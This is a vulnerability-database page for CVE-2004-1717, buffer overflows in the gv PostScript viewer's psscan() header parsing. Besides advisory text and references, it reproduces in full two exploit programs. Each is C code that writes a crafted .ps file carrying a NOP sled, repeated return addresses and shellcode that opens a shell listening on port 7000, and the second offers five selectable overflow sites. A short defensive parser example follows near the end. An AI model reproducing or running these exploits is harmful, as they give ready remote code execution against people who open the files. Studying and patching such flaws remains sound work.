CVE-2004-1717
CVSS 7.5
Published: 2004-08-16 00:00:00
Revised: 2016-10-17 22:59:45

[Original] Multiple buffer overflows in the psscan function in ps.c for gv (ghostview) allow remote attackers to execute arbitrary code via a Postscript file with a long (1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder, or (5) Pages value.


[CNNVD] GV PostScript and PDF Viewer Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200408-132)

Multiple buffer overflow vulnerabilities exist in the psscan function in the file ps.c of gv (ghostview). A remote attacker can execute arbitrary code via a PostScript file containing an overlong (1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder, or (5) Pages value.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:gv:gv:2.7b4
cpe:/a:gv:gv:3.5.3
cpe:/a:gv:gv:2.7b3
cpe:/a:gv:gv:3.1.6
cpe:/a:gv:gv:3.4.3
cpe:/a:gv:gv:3.5.2
cpe:/a:gv:gv:3.2.4
cpe:/a:gv:gv:3.4.2
cpe:/a:gv:gv:2.7b5
cpe:/a:gv:gv:3.1.4
cpe:/a:gv:gv:3.0.0
cpe:/a:gv:gv:3.4.12
cpe:/a:gv:gv:3.0.4
cpe:/a:gv:gv:2.7b2
cpe:/a:gv:gv:2.7b1
cpe:/a:gv:gv:2.7.6
cpe:/a:gv:gv:2.9.4
cpe:/a:gv:gv:3.5.8

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1717
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1717
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-132
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109267677114331&w=2
(UNKNOWN)  BUGTRAQ  20040816 gv buffer overflows: here, there, and everywhere
http://www.securityfocus.com/bid/10944
(VENDOR_ADVISORY)  BID  10944
http://xforce.iss.net/xforce/xfdb/17019
(VENDOR_ADVISORY)  XF  gv-psscan-header-bo(17019)

- Vulnerability information

GV PostScript and PDF Viewer Multiple Remote Buffer Overflow Vulnerabilities
High risk  Buffer overflow
2004-08-16 00:00:00 2005-10-20 00:00:00
Remote
Multiple buffer overflow vulnerabilities exist in the psscan function in the file ps.c of gv (ghostview). A remote attacker can execute arbitrary code via a PostScript file containing an overlong (1) BoundingBox, (2) comment, (3) Orientation, (4) PageOrder, or (5) Pages value.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (390)

GV PostScript Viewer Remote Buffer overflow Exploit (EDBID:390)
linux remote
2004-08-13 Verified
0 infamous41md
N/A [Download]
/*
 * gv postscript viewer exploit , infamous42md AT hotpop DOT com
 *
 * run of the mill bof.  spawns a remote shell on port 7000.  woopty doo. if
 * someone has been able to exploit the heap overflow in cfengine, please email
 * me and teach me something. after days of pain i've concluded it's not 
 * possible b/c you can't manipulate the heap enough to get anything good in 
 * front of you.  please prove me wrong so i can learn.
 *
 * shouts to mitakeet
 *
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  [n00b localho outernet] gcc -Wall -o gvown gvown.c
 *  [n00b localho outernet] ./gvown 0xbffff350
 *  [n00b localho outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps 
 *  [n00b localho outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN   
  
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"


/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    

int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_long  retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);

    /* create 3vil buf */
    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1;   /* + NULL */

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");
    
    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);
    
    return 0;
}

// milw0rm.com [2004-08-13]

- Vulnerability information (400)

GV PostScript Viewer Remote Buffer overflow Exploit (2) (EDBID:400)
linux remote
2004-08-18 Verified
0 infamous41md
N/A [Download]
/*
 * there are at least 4 other stack buffer overflows, and 2 heap overflows.
 * the first exploit i wrote exploited the one in the GLSA, and this one exploits 
 * that hole and four other ones as well. all of these are in the psscan() function
 * located in the ps.c file: 'grep -nP 'sscanf\(.*?%%.*?%s' ps.c'
 * 
 * gv postscript viewer exploit part deux, infamous42md AT hotpop DOT com
 *
 * ok kiddies you've got choices here!  we can overflow the text buffer at 5
 * different places, we can also overflow the heap at 2 places, and ooh i
 * bet if you look around there are tons of other places as well!
 *
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- ASDF"
#define BOUND_BOX "%%BoundingBox:"
#define ORIENTATION "%%Orientation:"
#define PAGE_ORDER "%%PageOrder:"
#define PAGES "%%Pages:"
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"

/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x3b\x2c\x30\xcd\x80";

    

int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_char  methodman = 0x0;
    u_long  retaddr;

    if(argc < 3){
        fprintf(stderr, "Usage: %s < retaddr > < ownage method c b o p r>\n",
                argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);
    methodman = argv[2][0];

    /* create 3vil buf */
    memset(buf, NOP, BS);
    if(methodman == 'b')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, BOUND_BOX);
    else if(methodman == 'c')
        len = snprintf(buf, BS-1, "%s", PS_COMMENT);
    else if(methodman == 'o')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, ORIENTATION);
    else if(methodman == 'p')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, PAGES);
    else if(methodman == 'r')
        len = snprintf(buf, BS-1, "%s\n%s", PS_COMMENT, PAGE_ORDER);
    else{
        printf(
        "Cmon man pick a funkin method!!\n"
        "oh i see, 5 is not enough to choose from??\n"
        "don't worry, there are more, just read the source to find them\n"
        "ok fine, you don't want to overflow the stack, understandable.\n"
        "there are also some heap overflows you picky bastard\n"
        "grep -n sscanf\n");
        return EXIT_FAILURE;
    }

    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 2; 

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0)
        die("open");
    
    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);
    
    return 0;
}

// milw0rm.com [2004-08-18]
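All five psscan() overflow sites named in the advisory are DSC header values read with an unbounded string conversion (the second exploit's own grep for `sscanf` with `%s` points at them). The following is an added example, not code from gv or from either exploit: a bounded header reader that rejects rather than truncates overlong values, plus a scanner that counts such values in a PostScript prologue. The 255-byte limit, the function names and the sample prologue are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed limit for this example; gv's real buffer sizes are not on the page. */
#define DSC_VALUE_MAX 255

/* Header keywords the advisory names as overflow sites in psscan(). */
static const char *const dsc_keys[] = {
    "%!PS-Adobe-", "%%BoundingBox:", "%%Orientation:", "%%PageOrder:", "%%Pages:", NULL
};

/* Bounded replacement for the unbounded pattern sscanf(line, "%%%%Key: %s", buf).
 * Returns 1 and copies the value when `line` starts with `key` and the value fits,
 * 0 when the line is for another key, -1 when the value is too long (rejected). */
int dsc_parse_value(const char *line, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key);
    if (strncmp(line, key, klen) != 0)
        return 0;
    const char *p = line + klen;
    while (*p == ' ' || *p == '\t')
        p++;
    size_t vlen = strcspn(p, "\r\n");   /* value ends at end of line */
    if (vlen >= outlen)
        return -1;
    memcpy(out, p, vlen);
    out[vlen] = '\0';
    return 1;
}

/* Walk a prologue line by line; return how many header values exceed DSC_VALUE_MAX. */
int dsc_count_overlong(const char *ps)
{
    int bad = 0;
    char value[DSC_VALUE_MAX + 1];
    for (const char *line = ps; *line; ) {
        size_t len = strcspn(line, "\n");
        for (int i = 0; dsc_keys[i]; i++)
            if (dsc_parse_value(line, dsc_keys[i], value, sizeof value) == -1)
                bad++;
        line += len;
        if (*line == '\n')
            line++;
    }
    return bad;
}

/* Constructed sample: benign headers plus one BoundingBox padded to 400 bytes,
 * the shape of file the advisory describes. Returns 1 (only the padded line). */
int dsc_demo(void)
{
    static char sample[1024];
    int n = snprintf(sample, sizeof sample, "%%!PS-Adobe-3.0\n%%%%Pages: 3\n%%%%BoundingBox: ");
    memset(sample + n, 'A', 400);
    strcpy(sample + n + 400, "\n%%Orientation: Portrait\n");
    return dsc_count_overlong(sample);
}
```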

- Vulnerability information

15970
gv psscan Function Postscript File Multiple Header Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-08-16 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete